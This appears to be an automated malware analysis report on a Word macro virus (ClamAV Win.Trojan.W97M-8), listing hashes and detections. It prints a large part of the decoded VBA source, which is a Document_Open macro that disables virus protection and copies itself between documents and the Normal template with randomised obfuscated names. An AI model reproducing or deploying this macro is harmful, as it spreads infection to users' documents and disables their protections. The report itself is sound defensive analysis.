Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7b507870db05f0fe…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 52.5 KB
Created: 1998-12-13 08:49:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: c39de6d727ca6f56700536f93212fb82
SHA-1: 4a5d3284f6d06c4f2fb26a753f6d49948fc3b6bc
SHA-256: 7b507870db05f0fe1251188dc9a657961e9d95d38061f6038518b0f104d0fd4d
Risk Score: 120

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature Win.Trojan.W97M-8. It contains VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code when the document is opened. The macro attempts to disable virus protection and auto-macros, suggesting an intent to evade detection and ensure execution of its payload.

Heuristics (3)

  • ClamAV: Win.Trojan.W97M-8 (severity: critical) CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.W97M-8
  • VBA macros detected (severity: medium, 1 related finding) OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro (severity: high) OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 29569 bytes
SHA-256: 819d6645445078a8dc2e9910b451960af5710dc7ea3a527dda67ff482f1d19a5

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
¤õ´‰ÁíîÛ“¼‘Ìàì…ôôß…ß©«¾¢¢ˆÑ¢……ƨåڥâԺœï  = "´˜Ä¶ŸÂõ§ö¢ïç"
ß×ù•´ºê‚ = ActiveDocument.VBProject.VBComponents(1).CodeModule.countoflines
™•µŒð�ÑâˆâàÝ÷ß = NormalTemplate.VBProject.VBComponents(1).CodeModule.countoflines
Application.Options.VirusProtection = False
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.SaveNormalPrompt = False
If ß×ù•´ºê‚ > 169 And ™•µŒð�ÑâˆâàÝ÷ß > 169 Then Exit Sub
If ™•µŒð�ÑâˆâàÝ÷ß > 169 Then
Set �‰¬�¨¢Ë†ÂßÀ¦Œî¾�Ó“›èŪ»ôæ�éó = ActiveDocument
Set ‡Óµ½’ùé„�� = NormalTemplate
GoTo •ŠÊ¨Ä ÖÌÓÙ£¡µˆ­ÁÀÒé§’ë ±å
End If
If ™•µŒð�ÑâˆâàÝ÷ß < 170 Then
Set �‰¬�¨¢Ë†ÂßÀ¦Œî¾�Ó“›èŪ»ôæ�éó = NormalTemplate
Set ‡Óµ½’ùé„�� = ActiveDocument
End If
ReDim ƒê¶—Ð(50, 50)
¸£ƒ‡ÅÍ×Äè×ŽÌ = ‡Óµ½’ùé„��.VBProject.VBComponents(1).CodeModule.countoflines
ß×ù•´ºê‚ = 0
Do Until ß×ù•´ºê‚ = ¸£ƒ‡ÅÍ×Äè׎Ì
ß×ù•´ºê‚ = ß×ù•´ºê‚ + 1
ä�Ã÷�Ð÷Ô = ‡Óµ½’ùé„��.VBProject.VBComponents(1).CodeModule.Lines(ß×ù•´ºê‚, 1)
If Left(ä�Ã÷�Ð÷Ô, 1) = "'" Then
ßùŽ äÙ‡áÕÄ­Åò = Len(ä�Ã÷�Ð÷Ô)
ä�Ã÷�Ð÷Ô = Mid(ä�Ã÷�Ð÷Ô, 2, ßùŽ äÙ‡áÕÄ­Åò)
 Ü = ""
Ê®· = Len(ä�Ã÷�Ð÷Ô)
Randomize Timer
Ò–À½¡ÑµÎŠÐØ�‡£®×ÂŽ½Éס´²:
êµ—èùÙ×ß¹Èö¶ˆ£ = CInt(Rnd * 30) + 1
For ݈ä �¿…ì­Ô = 1 To êµ—èùÙ×ß¹Èö¶ˆ£
'™•µŒð�ÑâˆâàÝ÷ß
'�‰¬�¨¢Ë†ÂßÀ¦Œî¾�Ó“›èŪ»ôæ�éó
'‡Óµ½’ùé„��
'Ò¶Ž¸šÌ¹×ô©œ–œð
'øŠòÓù ½œ
'³‘êîˆÈ�óøÎοÍï
'ÎÁ�à­ä¢˜¤ºøœÊÜÛ
'ß×ù•´ºê‚
'Š
'™Ìòç¿ð×—¤
'젻vйà·í¡Œà˜‘‡ß
'ßùŽ äÙ‡áÕÄ­Åò
'ó•¨èÀ‚±™ÙÓ‰Ãæ•¶Æá
'ž÷�
'Æï£¯ÎàºÇÎŒ£ˆä˜´õ—ííÈÕЈ²
'Ò–À½¡ÑµÎŠÐØ�‡£®×ÂŽ½Éס´²
'ìܷǪ¼�œÃ‰Ö�¤ÎŒ�¼¥„û÷ð”
'Ìõ·
'Ü¿ŠÏ‘Ô´˜ð
'Ê®·
'ä�Ã÷�Ð÷Ô
'Æî¨µŒ ƒ¥Ï§ÚÊ®ÆùÊ­”ôÄá™°ÄñÄŠ
'׆ò玱éç¾´·³ŸËä¹õ¿Ð‹�ˆ°¹šÛ
'°Ó²³¨—³�Žß�ÆÍž÷ûÈÇ‘
'Ü¿ŠÏ‘Ô´˜ð
'ßùŽ äÙ‡áÕÄ­Åò
'Š
'§Ÿ§¼àöà™ææ�é–¹¡’¿ó´¶Éﱸœ“˜
'³‘êîˆÈ�óøÎοÍï
'¸£ƒ‡ÅÍ×Äè׎Ì
'­Úé÷Éï²»ú¢§ö�‡Ú̉
'݈ä �¿…ì­Ô
'™Ìòç¿ð×—¤
'�å΄�¯´­­Îñ�•¸˜
'àïü†¸
'稜»Ö¦Ýð
'ª£¨§©ôä«šÊøæû±™ð×ïÉŒû£»�
'õÄÈÎáÞÏäÖò¼ºŒìÙÚáç¶Ñí–š
' Ü
'‘•£™È“ᥲøÔ¨Ù‹§ç®í鄥䫒ÈÏ­
'êµ—èùÙ×ß¹Èö¶ˆ£
'݈ä �¿…ì­Ô
'ƒê¶—Ð
'À½
'ß×ù•´ºê‚
'°Ó²³¨—³�Žß�ÆÍž÷ûÈÇ‘
'ò‹ŸÍž¼ÎÄ̤²
'•ŠÊ¨Ä ÖÌÓÙ£¡µˆ­ÁÀÒé§’ë ±å
'¤õ´‰ÁíîÛ“¼‘Ìàì…ôôß…ß©«¾¢¢ˆÑ¢……
õÄÈÎáÞÏäÖò¼ºŒìÙÚáç¶Ñí–š:
ò‹ŸÍž¼ÎÄ̤² = CInt(Rnd * 250) + 1
If ò‹ŸÍž¼ÎÄ̤² = 13 Then GoTo õÄÈÎáÞÏäÖò¼ºŒìÙÚáç¶Ñí–š
If ò‹ŸÍž¼ÎÄ̤² < 65 Then GoTo õÄÈÎáÞÏäÖò¼ºŒìÙÚáç¶Ñí–š
If ò‹ŸÍž¼ÎÄ̤² < 130 Then GoTo õÄÈÎáÞÏäÖò¼ºŒìÙÚáç¶Ñí–š
 Ü =  Ü & Chr(ò‹ŸÍž¼ÎÄ̤²)
Next ݈ä �¿…ì­Ô
ª£¨§©ôä«šÊøæû±™ð×ïÉŒû£»� = ª£¨§©ôä«šÊøæû±™ð×ïÉŒû£»� + 1
ƒê¶—Ð(ª£¨§©ôä«šÊøæû±™ð×ïÉŒû£»�, 1) = ä�Ã÷�Ð÷Ô
ƒê¶—Ð(ª£¨§©ôä«šÊøæû±™ð×ïÉŒû£»�, 2) =  Ü
End If
Loop
•ŠÊ¨Ä ÖÌÓÙ£¡µˆ­ÁÀÒé§’ë ±å:
ß×ù•´ºê‚ = 1
§Ÿ§¼àöà™ææ�é–¹¡’¿ó´¶Éﱸœ“˜ = "Private Sub Document_Open()" & Chr(13)
If ™•µŒð�ÑâˆâàÝ÷ß < 170 Then
êµ—èùÙ×ß¹Èö¶ˆ£ = CInt(Rnd * 30) + 1
For ݈ä �¿…ì­Ô = 1 To êµ—èùÙ×ß¹Èö¶ˆ£
�å΄�¯´­­Îñ�•¸˜:
Ü¿ŠÏ‘Ô´˜ð = CInt(Rnd * 250)
If Ü¿ŠÏ‘Ô´˜ð = 13 Then GoTo �å΄�¯´­­Îñ�•¸˜
If Ü¿ŠÏ‘Ô´˜ð < 65 Then GoTo �å΄�¯´­­Îñ�•¸˜
If Ü¿ŠÏ‘Ô´˜ð < 130 Then GoTo �å΄�¯´­­Îñ�•¸˜
 Ü =  Ü & Chr(Ü¿ŠÏ‘Ô´˜ð)
Next ݈ä �¿…ì­Ô
êµ—èùÙ×ß¹Èö¶ˆ£ = CInt(Rnd * 20)
For ‘•£™È“ᥲøÔ¨Ù‹§ç®í鄥䫒ÈÏ­ = 1 To êµ—èùÙ×ß¹Èö¶ˆ£
àïü†¸:
Ü¿ŠÏ‘Ô´˜ð = CInt(Rnd * 250)
If Ü¿ŠÏ‘Ô´˜ð = 13 Then GoTo àïü†¸
If Ü¿ŠÏ‘Ô´˜ð = 34 Then GoTo àïü†¸
If Ü¿ŠÏ‘Ô´˜ð < 130 Then GoTo àïü†¸
°Ó²³¨—³�Žß�ÆÍž÷ûÈÇ‘ = °Ó²³¨—³�Žß�ÆÍž÷ûÈÇ‘ & Chr(Ü¿ŠÏ‘Ô´˜ð)
Next ‘•£™È“ᥲøÔ¨Ù‹§ç®í鄥䫒ÈÏ­
§Ÿ§¼àöà™ææ�é–¹¡’¿ó´¶Éﱸœ“˜ = §Ÿ§¼àöà™ææ�é–¹¡’¿ó´¶Éﱸœ“˜ &  Ü & "=" & Chr(34) & °Ó²³¨—³�Žß�ÆÍž÷ûÈÇ‘ & Chr(34) & Chr(13)
End If
ßùŽ äÙ‡áÕÄ­Åò = ‡Óµ½’ùé„��.VBProject.VBComponents(1).CodeModule.countoflines
For Š = 2 To ßùŽ äÙ‡áÕÄ­Åò
§Ÿ§¼àöà™ææ�é–¹¡’¿ó´¶Éﱸœ“˜ = §Ÿ§¼àöà™ææ�é–¹¡’¿ó´¶Éﱸœ“˜ & ‡Óµ½’ùé„��.VBProject.VBComponents(1).CodeModule.Lines(Š, 1) & Chr(13)
Next Š
If ™•µŒð�ÑâˆâàÝ÷ß > 169 Then GoTo ¤õ´‰ÁíîÛ“¼‘Ìàì…ôôß…ß©«¾¢¢ˆÑ¢……
Do
³‘êîˆÈ�óøÎοÍï = 0
¸£ƒ‡ÅÍ×Äè×ŽÌ = Len(§Ÿ§¼àöà™ææ�é–¹¡’¿ó´¶Éﱸœ“˜)
À½ = À½ + 1
If ƒê¶—Ð(À½, 1) = 
... (truncated)